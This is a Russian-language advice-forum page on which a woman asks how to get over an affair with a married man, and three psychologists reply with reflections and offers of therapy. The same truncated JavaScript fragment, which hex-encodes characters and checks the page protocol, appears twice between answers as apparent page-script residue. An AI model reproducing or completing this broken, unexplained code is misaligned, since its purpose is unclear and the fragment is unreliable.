Как справиться с несчастной любовью?

Камилла 24.10.2015

Здравствуйте! Год назад порвала отношения с женатым мужчиной, вышла замуж за хорошего человека, особых чувств к которому никогда не испытывала и, пожалуй, до сих пор не испытываю.

Не так давно случайно встретила своего бывшего мужчину, разговорились. Он сказал, что никогда бы не оставил свою супругу, что его сердце принадлежит ей одной, но что ко мне его до сих пор тянет физически и он бы не прочь возобновить отношения. В принципе я всегда это знала, но когда он сам это озвучил, внутри возникла горечь - от того, что 3 года полной самоотдачи подарены человеку, который просто развлекался. Как будто на сердце рубец. Чувствую одиночество и опустошенность. Не хочу, чтобы все это осело во мне и ушло в подсознание. Как практически справиться с этим? Заранее спасибо за помощь!

Черныш Надежда Николаевна

Опыт 17 лет

Черныш Надежда Николаевна

Опыт 17 лет

Здравствуйте Камила! Очень грустно, что так получилось у вас, но вы сами создали такую ситуацию, которая вам делает больно. Вступая в отношения с женатым мужчиной, нужно осознавать, то ни к чему хорошему это не приведет. Ведь он женился на своей жене, значит у него чувства. А вы себя заранее обрекли на страдания. Мужчины и женщины иногда изменяют своему партнеру, из разных причин, но они остаются все рано в семье. У вас сейчас тоже семья и представьте себе если бы ваш муж нашел кого-нибудь на стороне, что бы с вами было? Цените что у вас есть сейчас.

// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e

Черныш Надежда Николаевна, психолог в Алматы

Тлегенова Харлан Амантаевна

Здравствуйте, Камила,

Вы пишете что в принципе  знали о том, что он не оставит семью, но все равно возникли пустота и одиночество. Т.е.  все таки была надежда, что он любит Вас по-настоящему и ради Вас готов на все. И сейчас Вы разочарованы в нем, в себе, в чувствах. Как будто утеряно что-то очень дорогое навсегда. Конечно, Вы с этим справитесь. Есть два способа. Один знают все - стиснуть зубы, переключиться на свою семью и ждать когда все забудется. Время лечит. Второй - обратиться к специалисту за поддержкой и пониманием себя.

Выбор за Вами.

С уважением,

Тлегенова Харлан, психолог-психоаналитик, групповой терапевт,г.Алматы

Здравствуйте, Камила!

А в какой помощи Вы нуждаетесь?

Забыть то, что Вы "подарили" три года человеку, который просто развлекался с Вами?

Думаю, есть смысл принять то, что с Вами было, поблагодарить его за "учебу", и жить дальше, имея прививку от таких отношений.

И, самое важное, попытаться разобраться в своей жизни, попытаться понять, что в ней важное, что второстепенное....

Попытаться повзрослеть....

Т.е. не "справляться" с "этим", а - разобраться со многим.

Если решитесь на такую работу, могу быть Вам полезным.

// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e

Г.Идрисов (работаю и по скайпу).